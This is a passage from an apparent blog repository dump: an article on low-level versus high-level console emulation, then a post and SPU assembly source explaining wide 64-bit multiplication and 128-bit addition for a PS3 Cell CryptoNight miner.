 13 |                 box-sizing: border-box;
 14 |                 min-width: 200px;
 15 |                 max-width: 980px;
 16 |                 margin: 0 auto;
 17 |                 padding: 45px;
 18 |             }
 19 | 
 20 |             header {
 21 |                 position: relative;
 22 |             }
 23 |             header > .links {
 24 |                 position: absolute;
 25 |                 right: 0;
 26 |             }
 27 | 
 28 |             .post-key {
 29 |                 background-color: hsl(45, 67%, 80%);
 30 |                 border-radius: 5px 0px 0px 5px;
 31 |                 padding: 2px 6px 2px 8px;
 32 |                 margin: 0px;
 33 |             }
 34 |             .post-val {
 35 |                 background-color: hsl(45, 67%, 90%);
 36 |                 border-radius: 0px 5px 5px 0px;
 37 |                 padding: 2px 8px 2px 6px;
 38 |                 margin: 0px;
 39 |             }
 40 | 
 41 |             footer {
 42 |                 text-align: center;
 43 |             }
 44 |         
 45 |             @media (max-width: 767px) {
 46 |                 body {
 47 |                     padding: 15px;
 48 |                 }
 49 |             }
 50 |         </style>
 51 |     </head>
 52 |     <body class="markdown-body">
 53 |         <header>
 54 |             <div class="links">
 55 |                 <span>
 56 |                     <a href="https://twitter.com/AlexAltea">Twitter</a> |
 57 |                     <a href="https://github.com/AlexAltea">Github</a> |
 58 |                     <a href="mailto:alexandro@phi.nz">Email</a>
 59 |                 </span>
 60 |             </div>
 61 |             <span><a href="../../">&lt; Other articles</a></span>
 62 |         </header>
 63 |         <article>
 64 |             <h1>LLE vs HLE and their tradeoffs</h1>
 65 |             <p>
 66 |                 <span 
 67 |                     class="post-key">Author</span><span
 68 |                     class="post-val">Alexandro Sanchez</span>
 69 |                 <span
 70 |                     class="post-key">Date</span><span
 71 |                     class="post-val">2018-04-18</span>
 72 |             </p>
 73 |             <h2 id="introduction">Introduction</h2>
 74 | <p>This article aims to give an intuitive understanding for the terms "<em>Low-Level Emulation</em>" (LLE) and "<em>High-Level Emulation</em>" (HLE) often heard in the emulation scene, their differences and tradeoffs in development/performance costs, and how developers choose one paradigm or the other.</p>
 75 | <p>Machines are made of several <em>layers of abstraction</em>, each of them relying in the layer below to perform some particular task. In the context of gaming consoles, you might consider these layers (ordered from higher to lower level):</p>
 76 | <ul>
 77 | <li>Game</li>
 78 | <li>Game engine</li>
 79 | <li>System libraries</li>
 80 | <li>Kernel/drivers</li>
 81 | <li>Hardware</li>
 82 | </ul>
 83 | <p>That's where these "<em>low-level</em>" or "<em>high-level</em>" terms come from. Something is more "<em>high-level</em>" when it has more layers of abstraction below it, and it's more "<em>low-level</em>" when it has more layers of abstraction above it. With so many layers, the terms "low" and "high" can become quite subjective (developers can't even agree about whether some emulators are HLE or LLE). Furthermore, you could go even below than hardware-level and start thinking about transistors, atoms, etc. as even deeper layers of abstraction. Similarly, there's also even higher levels like the game scripts that are sometimes used to handle events/dialogues in a game. Of course, for most emulators, these layers are either too low, or too high. Why?</p>
 84 | <h2 id="emulation-paradigms">Emulation paradigms</h2>
 85 | <p>Let's tackle this question after giving an intuitive notion of what emulation is. Emulating a system all about putting a "<em>barrier</em>" between two adjacent layers of abstraction. For instance:</p>
 86 | <ul>
 87 | <li>"<em>LLE emulators</em>" (<a href="http://www.epsxe.com/">EPSXE</a>, <a href="https://pcsx2.net/">PCSX2</a>): They put the barrier between the hardware and the kernel. The entire software stack would run as usual thinking it's on a real PS1, PS2 etc., but whenever the hardware is accessed (e.g. PCI configuration registers, MMIO accesses, etc.) the emulator would intercept that and execute whatever the emudevs wanted. This is the reason why you get the original console menus and the overall "look and feel" of the console.</li>
 88 | <li>"<em>HLE emulators</em>" (<a href="https://rpcs3.net/">RPCS3</a>, <a href="https://citra-emu.org/">Citra</a>): They put the barrier between the kernel and userland (i.e. applications, games, etc.). The application runs as usual (of course, after translating userland instructions), but whenever it needs to access the operating system (e.g. to open files, to map memory, to create threads), that request aka. syscall will be intercepted and handled by some code written by the emudevs. This is the reason why you can typically just drag-and-drop a game and start playing it without booting any underlying OS.</li>
 89 | </ul>
 90 | <p>Back to the original question, why do emulators pick the barriers always at these two "hot spots", i.e. LLE (hardware and kernel) and HLE (kernel and userland)?</p>
 91 | <p>When you place this "emulation" barrier between two layers, you have to <strong>reimplement</strong> the layer below (i.e. reimplement the hardware on LLE, reimplement the kernel on HLE), so that the layer(s) above it can <strong>execute</strong> successfully. This results in two costs that you have to balance: "<em>development time</em>" and "<em>execution time</em>". Let me explain why this balance is important with few extreme examples of poor balances:</p>
 92 | <ul>
 93 | <li>
 94 | <p><em>Too high-level</em>: What would happen if you'd put that barrier between the game engine and the actual game? This idea used to be not so crazy, as it's what https://www.scummvm.org/ does. However, game engines these days are insanely complex with several million lines of code, it would take you centuries as a single developer to write an emulator that operated at such high levels. The "<em>development time</em>" would be massive, but the "<em>execution time</em>" (i.e. the emulator's performance) would be pretty good, since all the complex tasks have been reimplemented natively for the host system.</p>
 95 | </li>
 96 | <li>
 97 | <p><em>Too low-level</em>: What would happen if you wrote a transistor-level emulator? Again, not so crazy for old platforms, see the http://www.visual6502.org/ project. Assuming you had the equipment to decap a chip, a scanning electron microscope and fancy computer vision algorithms, you could easily generate code that simulates your target microprocessor, so little "<em>development time</em>", however, the "<em>execution time</em>" would be insanely high caused by simulating billions of transistors.</p>
 98 | </li>
 99 | </ul>
100 | <p>As you see, the rule of thumb is: higher-level incurs in larger development costs, and lower-level incurs in larger execution costs. But this is not always the case, and it has frequently led to misconceptions among the end-users. One of them is wrongly estimating the perfomance of different emulator paradigms.</p>
101 | <h2 id="performance-myths">Performance myths</h2>
102 | <p>Let's debunk some of those performance myths: Assume you want to emulate some machine, and you are learning about its hardware/software to balence "<em>development time</em>" vs "<em>execution time</em>" and pick the right strategy. How do you estimate those costs, specially "<em>execution time</em>", aside from the naive rule of thumb above? Estimating how fast something will run isn't just about which levels of abstraction you are targetting. The resulting performance will be depend on how many "<em>concepts</em>" from your <em>guest machine</em> (i.e. the thing you're trying to emulate), can be mapped into your <em>host machine</em> (the thing that will run the emulator).</p>
103 | <p>To give you an example, one such "<em>concept</em>" is the MMU. To explain it briefly (and slightly wrong/oversimplified but for the sake of the explanation will do), the MMU is the thing that allows each application have access to a slice of RAM by mapping addresses of a "<em>virtual address space</em>" (an imaginary arrangement of memory) to a "<em>physical address space</em>" (the actual RAM). Every time the application accesses the memory with some CPU instruction, behind the scenes the MMU will translate the virtual address given by the application into a physical one.</p>
104 | <ul>
105 | <li>
106 | <p>HLE emulators typically don't worry about the guest MMU since guest applications only use virtual addressing and whenever they try to contact the guest kernel (e.g. to allocate more memory), the emulator takes control and very generously gives the guest application a chunk of its own host virtual memory. So everyone's happy.</p>
107 | </li>
108 | <li>
109 | <p>LLE emulators have to worry about both the guest virtual memory and the guest physical memory. Many of them allocate guest physical memory during initialization, and do the "<em>guest virtual memory</em> to <em>guest physical memory</em>" translation by emulating the MMU on software. That causes every memory access (1 instruction) to invoke some specialized code that does the translation+access (100's of instructions). Of course, some translations can be cached, but the performance hit is still high. Remember that for every guest access, you have to traverse 4 layers:</p>
110 | <ol>
111 | <li>Guest virtual memory</li>
112 | <li>Guest physical memory</li>
113 | <li>Host virtual memory</li>
114 | <li>Host physical memory</li>
115 | </ol>
116 | </li>
117 | </ul>
118 | <p>However in some scenarios (this depends on MMU quirks, page sizes, etc.), you could have use your host computer's own MMU to handle the accesses of the guest applications directly. One way of accomplishing this is running the guest software in a VM and having an hypervisor letting it directly access a slice of the host computer's physical RAM directly. This would remove the need for expensive software-based address translation and result in large performance gains.</p>
119 | <h2 id="conclusion">Conclusion</h2>
120 | <p>By making a better use of the host machine's resources, in the MMU and many other different areas, you can make even low-level emulation happen with an acceptable performance. It's not a surprise that Sony used this strategy to emulate the PS2 on the PS3, and Microsoft to emulate the Xbox on Xbox 360 <a href="http://michaelbrundage.com/project/xbox-360-emulator/">[1]</a> and Xbox 360 on Xbox One. This 10x performance slowdown while doing LLE is a myth, resulting from many oversimplifications and/or people that have poorly utilized the host machine's resources.</p>
121 | <p>Of course, massive slowdowns can still happen: with really heterogeneous architectures, some concepts can be hard to map into each other and you might have to resort to software emulation incurring in 10x and 100x performance penalties, but this isn't always necessarily the case. There are no magic "<em>performance penalty</em>" numbers, everything has to be considered in a case-by-case basis, and the only way of estimating what that would be is getting to know both guest and host systems really in detail.</p>
122 |         </article>
123 |         <hr>
124 |         <footer>
125 |             <p>
126 |                 Questions? Comments? <a href="https://github.com/AlexAltea/blog/issues">Open an issue!</a>
127 |             </p>
128 |             <p><a href="mailto:alexandro@phi.nz">alexandro@phi.nz</a></p>
129 |         </footer>
130 |     </body>
131 | </html>
132 | 


--------------------------------------------------------------------------------
/posts/2019-02-16-cell-miner-alu/_main.md:
--------------------------------------------------------------------------------
  1 | ---
  2 | layout: post
  3 | date: 2019-02-16
  4 | title: PS3/Cell Cryptomining: Wide arithmetic on SPUs
  5 | author: Alexandro Sanchez
  6 | ---
  7 | 
  8 | [TOC]
  9 | 
 10 | ## Background
 11 | 
 12 | Some time ago, I implemented a cryptocurrency miner for the [Cell B.E. Architecture](https://en.wikipedia.org/wiki/Cell_(microprocessor)) used in the PlayStation 3 and certain servers. Specifically, the goal was implementing PoW-algorithms based on CryptoNight, described by the [CryptoNote](https://cryptonote.org/standards/) standards and used by [Monero/XMR](https://www.getmonero.org/).
 13 | 
 14 | At their current valuation, no such cryptocurrency can be profitably mined using consumer PlayStation 3 hardware and this situation is not expected to revert in the short/mid term. Furthermore, possible long-term changes are irrelevant, as newer hardware will increasingly outperform the Cell B.E., raising mining difficulty and the profitability threshold ever further.
 15 | 
 16 | Consequently, I'm releasing the source code of this miner along with blog articles on technical aspects of Cell B.E. that might be of general interest (even if just for historical reasons):
 17 | 
 18 | 1. [PS3/Cell Cryptomining: Wide arithmetic on SPUs](.).
 19 | 2. [PS3/Cell Cryptomining: High-performance AES on SPUs](#). (TBD.)
 20 | 3. [PS3/Cell Cryptomining: Memory Flow Controller](#). (TBD.)
 21 | 
 22 | This first post describes the implementation of wide arithmetic operations on "narrow" ALUs present in the SPUs.
 23 | 
 24 | ## Multiplication (64-bit)
 25 | 
 26 | CryptoNight requires a 64-bit x 64-bit integer multiplication that results in a 128-bit integer. Implementing such operation on the SPUs is challenging as the largest multiplication granularity available is 16-bit x 16-bit to 32-bit due to the word-size limitations of the SPU ALUs. The following algorithm describes how to emulate such multiplication.
 27 | 
 28 | ### Theory
 29 | 
 30 | Consider the `a` and `b` input registers, the 64-bit LHS and RHS of the multiplication operation are composed of the half-words [a0, a1, a2, a3] and [b0, b1, b2, b3], respectively.
 31 | 
 32 | ```
 33 |    0        16       32       48       64       80       96       112      128
 34 |    +--------+--------+--------+--------+--------+--------+--------+--------+
 35 | a: |   a0   |   a1   |   a2   |   a3   |   XX   |   XX   |   XX   |   XX   |
 36 |    +--------+--------+--------+--------+--------+--------+--------+--------+
 37 |    +--------+--------+--------+--------+--------+--------+--------+--------+
 38 | b: |   b0   |   b1   |   b2   |   b3   |   XX   |   XX   |   XX   |   XX   |
 39 |    +--------+--------+--------+--------+--------+--------+--------+--------+
 40 |    MSB                                                                     LSB
 41 | ```
 42 | 
 43 | This is equivalent to the following representation:
 44 | 
 45 | ```
 46 | LHS := a3 + (a2 * 2^16) + (a1 * 2^32) + (a0 * 2^48)
 47 | RHS := b3 + (b2 * 2^16) + (b1 * 2^32) + (b0 * 2^48)
 48 | ```
 49 | 
 50 | Applying the distributive property, the multiplication of both values should be equivalent to:
 51 | 
 52 | ```
 53 | LHS * RHS = (a3 + (a2 * 2^16) + (a1 * 2^32) + (a0 * 2^48)) *
 54 |             (b3 + (b2 * 2^16) + (b1 * 2^32) + (b0 * 2^48))
 55 |           = (a3*b3*2^00) + (a3*b2*2^16) + (a3*b1*2^32) + (a3*b0*2^48) +
 56 |             (a2*b3*2^16) + (a2*b2*2^32) + (a2*b1*2^48) + (a2*b0*2^64) +
 57 |             (a1*b3*2^32) + (a1*b2*2^48) + (a1*b1*2^64) + (a1*b0*2^80) +
 58 |             (a0*b3*2^48) + (a0*b2*2^64) + (a0*b1*2^80) + (a0*b0*2^96)    
 59 | ```
 60 | 
 61 | Our implementation will perform these 16 multiplications of 16-bit words (`aX*bY`), shift the results (`*2^N`), and add everything together using 128-bit additions.
 62 | 
 63 | ### Implementation
 64 | 
 65 | First of all, let's recap the available multiplication operations in SPU (quoted from the *Synergistic Processor Unit Instruction Set Architecture v1.2*):
 66 | 
 67 | > * `mpy rt,ra,rb`: **Multiply**. The signed 16 least significant bits of the corresponding word elements of registers `ra` and `rb` are multiplied, and the 32-bit products are placed in the corresponding word elements of register `rt`.
 68 | > * `mpyhh rt,ra,rb`: **Multiply high high**. The signed 16 most significant bits of the word elements of registers `ra` and `rb` are multiplied, and the 32-bit products are placed in the corresponding word elements of register `rt`.
 69 | 
 70 | When necessary, unsigned variants are available by adding an `u` suffix to the instruction name.
 71 | 
 72 | #### 1. Multiplying half-words
 73 | 
 74 | The distributive unfolding of the multiplication described earlier involves multiplying 16 half-words pairs into 16 words. Each multiplication instruction yields a maximum of 4 32-bit words, but since only 64-bits are used in `a` and `b`, only 2 are useful.
 75 | 
 76 | To minimize the number of multiplications, we can duplicate/shuffle half-words to the unused 64-bits of the quad-word via `shufb` as follows (this step can also be used to switch endianness, if necessary):
 77 | 
 78 | ```
 79 |    0        16       32       48       64       80       96       112      128
 80 |    +--------+--------+--------+--------+--------+--------+--------+--------+
 81 | a: |   a0   |   a1   |   a2   |   a3   |   a2   |   a3   |   a0   |   a1   |
 82 |    +--------+--------+--------+--------+--------+--------+--------+--------+
 83 |    +--------+--------+--------+--------+--------+--------+--------+--------+
 84 | b: |   b0   |   b1   |   b2   |   b3   |   b0   |   b1   |   b2   |   b3   |
 85 |    +--------+--------+--------+--------+--------+--------+--------+--------+
 86 |    MSB                                                                     LSB
 87 | ```
 88 | 
 89 | Additionally, we left-shift by 16 both `a`, `b` into `c`, `d` respectively, to do high-low multiplications (similarly to the `mpyh` instruction but without post-shifting). It does not matter whether the least significant half-word is zeroed. The result is:
 90 | 
 91 | ```
 92 |    0        16       32       48       64       80       96       112      128
 93 |    +--------+--------+--------+--------+--------+--------+--------+--------+
 94 | c: |   a1   |  (a2)  |   a3   |  (a2)  |   a3   |  (a0)  |   a1   |  (00)  |
 95 |    +--------+--------+--------+--------+--------+--------+--------+--------+
 96 |    +--------+--------+--------+--------+--------+--------+--------+--------+
 97 | d: |   b1   |  (b2)  |   b3   |  (b0)  |   b1   |  (b2)  |   b3   |  (00)  |
 98 |    +--------+--------+--------+--------+--------+--------+--------+--------+
 99 |    MSB                                                                     LSB
100 | ```
101 | 
102 | This way we can generate all necessary multiplications as follows:
103 | 
104 | ```
105 | mpy     t0, a, b
106 | mpyhh   t1, a, d
107 | mpyhh   t2, b, c
108 | mpyhh   t3, a, b
109 | ```
110 | 
111 | Leaving us with the following results:
112 | 
113 | ```
114 |    0        16       32       48       64       80       96       112      128
115 |    +--------+--------+--------+--------+--------+--------+--------+--------+
116 | t0 |     a1 * b1     |     a3 * b3     |     a3 * b1     |     a1 * b3     |
117 |    +--------+--------+--------+--------+--------+--------+--------+--------+
118 |    +--------+--------+--------+--------+--------+--------+--------+--------+
119 | t1 |     a0 * b1     |     a2 * b3     |     a2 * b1     |     a0 * b3     |
120 |    +--------+--------+--------+--------+--------+--------+--------+--------+
121 |    +--------+--------+--------+--------+--------+--------+--------+--------+
122 | t2 |     b0 * a1     |     b2 * a3     |     b0 * a3     |     b2 * a1     |
123 |    +--------+--------+--------+--------+--------+--------+--------+--------+
124 |    +--------+--------+--------+--------+--------+--------+--------+--------+
125 | t3 |     a0 * b0     |     a2 * b2     |     a2 * b0     |     a0 * b2     |
126 |    +--------+--------+--------+--------+--------+--------+--------+--------+
127 |    MSB                                                                     LSB
128 | ```
129 | 
130 | #### 2. Shuffling half-words
131 | 
132 | Before adding each of these 16 words, we need to multiply each by the corresponding power of 2 computed previously (i.e. shifting by a certain amount in bits). These constants are:
133 | 
134 | ```
135 |    0        16       32       48       64       80       96       112      128
136 |    +--------+--------+--------+--------+--------+--------+--------+--------+
137 | t0 | t00          64 | t01           0 | t02          32 | t03          32 |
138 |    +--------+--------+--------+--------+--------+--------+--------+--------+
139 |    +--------+--------+--------+--------+--------+--------+--------+--------+
140 | t1 | t10          80 | t11          16 | t12          48 | t13          48 |
141 |    +--------+--------+--------+--------+--------+--------+--------+--------+
142 |    +--------+--------+--------+--------+--------+--------+--------+--------+
143 | t2 | t20          80 | t21          16 | t22          48 | t23          48 |
144 |    +--------+--------+--------+--------+--------+--------+--------+--------+
145 |    +--------+--------+--------+--------+--------+--------+--------+--------+
146 | t3 | t30          96 | t31          32 | t32          64 | t33          64 |
147 |    +--------+--------+--------+--------+--------+--------+--------+--------+
148 |    MSB                                                                     LSB
149 | ```
150 | 
151 | We need to move these words into their proper locations (note that some words like `t02` or `t30` are already well placed). Using scratch registers is necessary, since working directly on {t0, t1, t2, t3} would cause bits to get lost due to overlaps. Doing this naively would involve using 16 scratch registers, i.e. 16 128-bit integers to be added later on.
152 | 
153 | However, by shuffling bytes via `shufb` we can bring this down to only 7 scratch registers:
154 | 
155 | ```
156 |    128      112      96       80       64       48       32       16       0
157 |    +--------+--------+--------+--------+--------+--------+--------+--------+
158 | v0 |                 | ##### t00 ##### | ##### t02 ##### | ##### t01 ##### |
159 |    +--------+--------+--------+--------+--------+--------+--------+--------+
160 |    +--------+--------+--------+--------+--------+--------+--------+--------+
161 | v1 | ##### t30 ##### | ##### t32 ##### | ##### t31 ##### |                 |
162 |    +--------+--------+--------+--------+--------+--------+--------+--------+
163 |    +--------+--------+--------+--------+--------+--------+--------+--------+
164 | v2 |                 | ##### t33 ##### | ##### t03 ##### |                 |
165 |    +--------+--------+--------+--------+--------+--------+--------+--------+
166 |    +--------+--------+--------+--------+--------+--------+--------+--------+
167 | v3 |        | ##### t10 ##### | ##### t12 ##### | ##### t11 ##### |        |
168 |    +--------+--------+--------+--------+--------+--------+--------+--------+
169 |    +--------+--------+--------+--------+--------+--------+--------+--------+
170 | v4 |        | ##### t20 ##### | ##### t22 ##### | ##### t21 ##### |        |
171 |    +--------+--------+--------+--------+--------+--------+--------+--------+
172 |    +--------+--------+--------+--------+--------+--------+--------+--------+
173 | v5 |                          | ##### t13 ##### |                          |
174 |    +--------+--------+--------+--------+--------+--------+--------+--------+
175 |    +--------+--------+--------+--------+--------+--------+--------+--------+
176 | v6 |                          | ##### t23 ##### |                          |
177 |    +--------+--------+--------+--------+--------+--------+--------+--------+
178 |    MSB                                                                     LSB
179 | ```
180 | 
181 | This is accomplished by the following operations (note that only 5 shuffle masks are necessary):
182 | 
183 | ```
184 | shufb   v0, t0, t0, mask_v0
185 | shufb   v1, t3, t3, mask_v1
186 | shufb   v2, t0, t3, mask_v2
187 | shufb   v3, t1, t1, mask_v3_v4
188 | shufb   v4, t2, t2, mask_v3_v4
189 | shufb   v5, t1, t1, mask_v5_v6
190 | shufb   v6, t2, t2, mask_v5_v6
191 | ```
192 | 
193 | #### 3. Adding results
194 | 
195 | The final step is adding the 7 resulting 28-bit words {v0, ..., v6} as described by the algorithm "*Addition (128-bit)*". Let such algorithm be implemented by the macro `add_128(output, lhs, rhs)`. The final result `r` of the multiplication algorithm is computed as follows:
196 | 
197 | ```
198 | add_128  t0, v0, v1
199 | add_128  t1, v2, v3
200 | add_128  t2, v4, v5
201 | add_128  t0, t0, t1
202 | add_128  t0, t0, t2
203 | add_128   r, t0, v6
204 | ```
205 | 
206 | As a final step, one might shuffle bytes again to match the desired endianness.
207 | 
208 | ## Addition (128-bit)
209 | 
210 | During the implementation of "*Multiplication (64-bit)*" we required a 128-bit + 128-bit integer addition that results in a 128-bit integer, but the largest granularity we can achieve for additions in SPUs is 32-bit. Although our approach here is relatively straightforward, we document it here for the sake of completeness.
211 | 
212 | ### Theory
213 | 
214 | Consider the `a` and `b` input registers and the `s` output register, the 128-bit LHS and RHS of the addition operation composed of the 32-bit words [a0, a1, a2, a3] and [b0, b1, b2, b3], respectively.
215 | 
216 | ```
217 |    0                 32                64                96                128
218 |    +-----------------+-----------------+-----------------+-----------------+
219 | a: |        a0       |        a1       |        a2       |        a3       |  
220 |    +-----------------+-----------------+-----------------+-----------------+
221 |    +-----------------+-----------------+-----------------+-----------------+
222 | b: |        b0       |        b1       |        b2       |        b3       |
223 |    +-----------------+-----------------+-----------------+-----------------+
224 |    MSB                                                                     LSB
225 | ```
226 | 
227 | This is equivalent to the following representation:
228 | 
229 | ```
230 | LHS := a3 + (a2 * 2^32) + (a1 * 2^64) + (a0 * 2^96)
231 | RHS := b3 + (b2 * 2^32) + (b1 * 2^64) + (b0 * 2^96)
232 | ```
233 | 
234 | Similar to four-bit adder, we perform the addition component-wise propagating the carry bit from the LSW to the MSW. We represent this carry-bit with the `overflow` (shortened as `o`), that takes an addition result and outputs 1 if the addition is >= 2^32, and 0 otherwise.
235 | 
236 | ```
237 | s3 = a3 + b3
238 | s2 = a2 + b2 + overflow(s3)
239 | s1 = a1 + b1 + overflow(s2)
240 | s0 = a0 + b0 + overflow(s1)
241 | ```
242 | 
243 | ### Implementation
244 | 
245 | First of all, let's recap the available multiplication operations in SPU (quoted from the *Synergistic Processor Unit Instruction Set Architecture v1.2*):
246 | 
247 | > * `a rt,ra,rb`: **Add Word**. Each word element of register `ra` is added to the corresponding word element of register `rb`, and the results are placed in the corresponding word elements of register `rt`.
248 | > * `cg rt,ra,rb`: **Carry Generate**. Each word element of register `ra` is added to the corresponding word element of register `rb`. The carry out is placed in the least significant bit of the corresponding word element of register `rt`, and 0 is placed in the remaining bits of `rt`.
249 | > * `shlqbyi rt,ra,value`: **Shift Left Quadword by Bytes Immediate**. The contents of register `ra` are shifted left by the number of bytes specified by the unsigned 5-bit `value`. The result is placed in register `rt`.
250 | 
251 | #### 1. Basic idea
252 | 
253 | By using these instructions, we can perform this addition as follows:
254 | 
255 | ```
256 |    +-----------------+-----------------+-----------------+-----------------+
257 | t0 | t00:   a0 + b0  | t01:   a1 + b1  | t02:   a2 + b2  | t03:   a3 + b3  |
258 |    +-----------------+-----------------+-----------------+-----------------+
259 | c0 | c00: o(a1 + b1) | c01: o(a2 + b2) | c02: o(a3 + b3) |                 |
260 |    +-----------------+-----------------+-----------------+-----------------+
261 |    +-----------------+-----------------+-----------------+-----------------+
262 | t1 | t10:   t00+c00  | t11:   t01+c01  | t12:   t02+c02  |                 |
263 |    +-----------------+-----------------+-----------------+-----------------+
264 | c1 | c10: o(t01+c01) | c11: o(t02+c02) |                 |                 |
265 |    +-----------------+-----------------+-----------------+-----------------+
266 |    +-----------------+-----------------+-----------------+-----------------+
267 | t2 | t20:   t10+c10  | t21:   t11+c11  |                 |                 |
268 |    +-----------------+-----------------+-----------------+-----------------+
269 | c2 | c20: o(t11+c11) |                 |                 |                 |
270 |    +-----------------+-----------------+-----------------+-----------------+
271 |    +-----------------+-----------------+-----------------+-----------------+
272 | t3 | t30:   t20+c20  |                 |                 |                 |
273 |    +-----------------+-----------------+-----------------+-----------------+
274 | ```
275 | 
276 | Here, at each iteration *N = {0,1,2,3}*, the temporary variable *tN* contains the 32-bit componentwise addition of *tN-1* and *cN-1*. This can easily be done with the `a` instruction described before. The temporary variables *cN* contain the word-shifted carry bit of said addition, which can be achieved by a combination of the `cg` and `shlqbyi` instructions.
277 | 
278 | This process is kickstarted by computing the addition and shifted overflow of the original LHS and RHS components into the *t0* and *c0* registers respectively. The final output register `r` can simply be computed as [t30, t21, t12, t03].
279 | 
280 | #### 2. Optimizing register usage
281 | 
282 | By analyzing dependencies, you might observe that no more than 3 temporary variables are used at any time. Let's redefine these as `t0`, `t1`, `t2`. Additionally, given that left-shifts are always zero-extended, we can preserve the LSWs as we "carry on" with the computation (no pun intended), saving us from cherry-picking words from different temporaries into `r`.
283 | 
284 | The final algorithm would look like this:
285 | 
286 | ```
287 | cg         t1, lhs, rhs
288 | a          t0, lhs, rhs
289 | shlqbyi    t1, t1, 4
290 | cg         t2, t0, t1
291 | a          t0, t0, t1
292 | shlqbyi    t2, t2, 4
293 | cg         t1, t0, t2
294 | a          t0, t0, t2
295 | shlqbyi    t1, t1, 4
296 | a           r, t0, t1
297 | ```
298 | 
299 | Note that the same approach is used to perform 64-bit additions, required in CryptoNight's Memory-Hard Loop.
300 | 
301 | ## Sources
302 | 
303 | You can find the source code for these implementations in: [`arithmetic.s`](arithmetic.s).
304 | 


--------------------------------------------------------------------------------
/posts/2019-02-16-cell-miner-alu/arithmetic.s:
--------------------------------------------------------------------------------
  1 | /**
  2 |  * SPU high-performance wide arithmetic.
  3 |  * Author: Alexandro Sanchez Bach <alexandro@phi.nz>.
  4 |  */
  5 | 
  6 | // Registers
  7 | 
  8 | #define alu_reg_se32       $80
  9 | #define alu_reg_se64       $81
 10 | #define alu_reg_se128      $82
 11 | #define alu_reg_mul_lhs    $83
 12 | #define alu_reg_mul_rhs    $84
 13 | #define alu_reg_mul_m0     $85
 14 | #define alu_reg_mul_m1     $86
 15 | #define alu_reg_mul_m2     $87
 16 | #define alu_reg_mul_m3     $88
 17 | #define alu_reg_mul_m4     $89
 18 | #define alu_reg_add_m64    $90
 19 | 
 20 | #define alu_reg_i0         $40
 21 | #define alu_reg_i1         $41
 22 | #define alu_reg_t0         $42
 23 | #define alu_reg_t1         $43
 24 | #define alu_reg_t2         $44
 25 | #define alu_reg_t3         $45
 26 | #define alu_reg_v0         $46
 27 | #define alu_reg_v1         $47
 28 | #define alu_reg_v2         $48
 29 | #define alu_reg_v3         $49
 30 | #define alu_reg_v4         $50
 31 | #define alu_reg_v5         $51
 32 | #define alu_reg_v6         $52
 33 | 
 34 | // Constants
 35 | 
 36 |     .align 4
 37 |     .global alu_endian
 38 | alu_endian:
 39 |     // swap-endian-32
 40 |     .byte  0x03, 0x02, 0x01, 0x00, 0x07, 0x06, 0x05, 0x04
 41 |     .byte  0x0B, 0x0A, 0x09, 0x08, 0x0F, 0x0E, 0x0D, 0x0C
 42 |     // swap-endian-64
 43 |     .byte  0x07, 0x06, 0x05, 0x04, 0x03, 0x02, 0x01, 0x00
 44 |     .byte  0x0F, 0x0E, 0x0D, 0x0C, 0x0B, 0x0A, 0x09, 0x08
 45 |     // swap-endian-128
 46 |     .byte  0x0F, 0x0E, 0x0D, 0x0C, 0x0B, 0x0A, 0x09, 0x08
 47 |     .byte  0x07, 0x06, 0x05, 0x04, 0x03, 0x02, 0x01, 0x00
 48 | 
 49 |     .align 4
 50 |     .global alu_wswap
 51 | alu_wswap:
 52 |     // mul_lhs: switch endian, then word swap [0,1,2,3] -> [0,1,1,0]
 53 |     .byte  0x07, 0x06, 0x05, 0x04, 0x03, 0x02, 0x01, 0x00
 54 |     .byte  0x03, 0x02, 0x01, 0x00, 0x07, 0x06, 0x05, 0x04
 55 |     // mul_rhs: switch endian, then word swap [0,1,2,3] -> [0,1,0,1]
 56 |     .byte  0x07, 0x06, 0x05, 0x04, 0x03, 0x02, 0x01, 0x00
 57 |     .byte  0x07, 0x06, 0x05, 0x04, 0x03, 0x02, 0x01, 0x00
 58 | 
 59 |     .align 4
 60 |     .global alu_mul64_constants
 61 | alu_mul64_constants:
 62 |     // v0
 63 |     .byte  0x80, 0x80, 0x80, 0x80, 0x00, 0x01, 0x02, 0x03
 64 |     .byte  0x08, 0x09, 0x0A, 0x0B, 0x04, 0x05, 0x06, 0x07
 65 |     // v1
 66 |     .byte  0x00, 0x01, 0x02, 0x03, 0x08, 0x09, 0x0A, 0x0B
 67 |     .byte  0x04, 0x05, 0x06, 0x07, 0x80, 0x80, 0x80, 0x80
 68 |     // v2
 69 |     .byte  0x80, 0x80, 0x80, 0x80, 0x1C, 0x1D, 0x1E, 0x1F
 70 |     .byte  0x0C, 0x0D, 0x0E, 0x0F, 0x80, 0x80, 0x80, 0x80
 71 |     // v3+v4
 72 |     .byte  0x80, 0x80, 0x00, 0x01, 0x02, 0x03, 0x08, 0x09
 73 |     .byte  0x0A, 0x0B, 0x04, 0x05, 0x06, 0x07, 0x80, 0x80
 74 |     // v5+v6
 75 |     .byte  0x80, 0x80, 0x80, 0x80, 0x80, 0x80, 0x0C, 0x0D
 76 |     .byte  0x0E, 0x0F, 0x80, 0x80, 0x80, 0x80, 0x80, 0x80
 77 | 
 78 |     .align 4
 79 |     .global alu_add64_constants
 80 | alu_add64_constants:
 81 |     .byte  0xFF, 0xFF, 0xFF, 0xFF, 0x00, 0x00, 0x00, 0x00
 82 |     .byte  0xFF, 0xFF, 0xFF, 0xFF, 0x00, 0x00, 0x00, 0x00
 83 | 
 84 | // Macros
 85 | 
 86 | #define add_64(ret, lhs, rhs)                                                \
 87 |     shufb   alu_reg_t0, lhs, lhs, alu_reg_se64                              ;\
 88 |     shufb   alu_reg_t1, rhs, rhs, alu_reg_se64                              ;\
 89 |     cg      alu_reg_t2, alu_reg_t0, alu_reg_t1                              ;\
 90 |     a       alu_reg_t0, alu_reg_t0, alu_reg_t1                              ;\
 91 |     shlqbyi alu_reg_t2, alu_reg_t2, 4                                       ;\
 92 |     and     alu_reg_t2, alu_reg_t2, alu_reg_add_m64                         ;\
 93 |     a       alu_reg_t0, alu_reg_t0, alu_reg_t2                              ;\
 94 |     shufb          ret, alu_reg_t0, alu_reg_t0, alu_reg_se64                ;
 95 | 
 96 | #define add_128(ret, lhs, rhs)                                               \
 97 |     cg      alu_reg_t1, lhs, rhs                                            ;\
 98 |     a       alu_reg_t0, lhs, rhs                                            ;\
 99 |     shlqbyi alu_reg_t1, alu_reg_t1, 4                                       ;\
100 |     cg      alu_reg_t2, alu_reg_t0, alu_reg_t1                              ;\
101 |     a       alu_reg_t0, alu_reg_t0, alu_reg_t1                              ;\
102 |     shlqbyi alu_reg_t2, alu_reg_t2, 4                                       ;\
